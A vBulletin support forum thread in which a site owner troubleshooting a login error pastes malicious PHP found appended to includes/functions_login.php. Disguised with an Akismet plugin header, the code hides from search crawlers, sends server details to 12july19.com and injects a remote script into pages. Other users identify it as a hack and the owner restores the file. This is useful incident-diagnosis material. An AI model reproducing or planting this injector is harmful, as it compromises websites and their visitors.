Log in issues

There doesn't appear to be any line 552 in functions_login.php in that version. Can you look at that file and see if it has anything at the end that shouldn't be there? The last thing should be ?> on a line by itself.

Or you could just try uploading that file again from the original package. But I'd be a little curious to see what's there myself.

Where and what is the name of the file I need to look at....? Its been a bunch of years since I set this up...

Thanks

includes/functions_login.php

is this suppose to be there?

?>
<?php
#07589d#
/**
* @package Akismet
*/
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

if( empty( $rmth ) ) {
if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
"/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
$_SERVER['HTTP_USER_AGENT']
)
) {
} else {
error_reporting( 0 );
@ini_set( 'display_errors', 0 );
if( !function_exists( '__url_get_contents' ) ) {
function __url_get_contents( $remote_url, $timeout )
{
if( function_exists( 'curl_exec' ) ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $remote_url );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
$_url_get_contents_data = curl_exec( $ch );
curl_close( $ch );
} elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
$ctx = @stream_context_create(
array(
'http' =>
array(
'timeout' => $timeout,
)
)
);
$_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
} elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
$handle = @fopen( $remote_url, "r" );
$_url_get_contents_data = @stream_get_contents( $handle );
} else {
$_url_get_contents_data = __file_get_url_contents( $remote_url );
}
return $_url_get_contents_data;
}
}

if( !function_exists( '__file_get_url_contents' ) ) {
function __file_get_url_contents( $remote_url )
{
if( preg_match(
'/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
$remote_url,
$matches
)
) {
$protocol = strtolower( $matches[1] );
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return false;
}
if( $protocol == "http" ) {
$socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
} else {
// Bad protocol
return false;
}
if( !$socket ) {
// Error creating socket
return false;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite( $socket, $request );
if( $len_written === false || $len_written != strlen( $request ) ) {
// Error sending request
return false;
}
$response = "";
while( !@feof( $socket ) &&
( $buf = @fread( $socket, 4096 ) ) !== false ) {
$response .= $buf;
}
if( $buf === false ) {
// Error reading response
return false;
}
$end_of_header = strpos( $response, "\r\n\r\n" );
return substr( $response, $end_of_header + 4 );
}
}

$rmth['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$rmth['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$rmth['PHP_SELF'] = $_SERVER['PHP_SELF'];
$rmth['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
$rmth['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
$rmth['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
$rmth['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
$rmth['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];

$rmth = __url_get_contents(
"http://12july19.com/vittunebiki/js/zgtx6y2p.php" . "?fid=3709986&info=" . http_build_query( $rmth ) . "&no=1&allow=1",
2
);

$rmth = trim( $rmth );
if( $rmth !== 'false' ) {
echo "<script type="text/javascript" src="http://12july19.com/vittunebiki/js/zgtx6y2p.php?id=61535493"></script>";
}
}
}
#/07589d#
?>

No, it shouldn't. I hate to suggest that your site's been hacked without knowing for sure what that's all about, but it looks like it tries insert some javascript on your pages. I don't know how akismet works, but this seems to load js from 12july19.com, which I don't think it related to akismet.

At the very least you'd want to replace that file, and maybe use Maintenance > Diagnostics > Suspect File Versions to see if any other files have changed. To be safe, you might want to follow these instructions: http://www.vbulletin.com/forum/blogs...ve-been-hacked

Edit: yeah, I googled __url_get_contents (the name of the function that's defined in that code) and I find a number of other people who found that code in one of their files, so I think it is malicious (or at least it's not doing you any good).

I deleted that file and uploaded the old one...all good....

What is the name of the setup file that has the admin user and pass and where is it located?

I find this interesting. Akismet is a spam program; however I find it in my forum. Do these a s s h o l e s really think that I will use it after hacking my site?

If you're talking about a vbulletin admin, you'd just change the password like you would for any other user.


I don't think it has anything to do with Akismet. I think the hackers put that comment in there so that maybe people would think it was something legitimate and not delete it.

I thought I remember adding a user and pass to a file that "hard coded" the admin pass. Thought it was during the set up.....one that had config info in it to direct to the databases and website.

That's includes/config.php, but I think the only password that goes in there is the one for connecting to the database server.

There's no file with any login details other than the config file for the database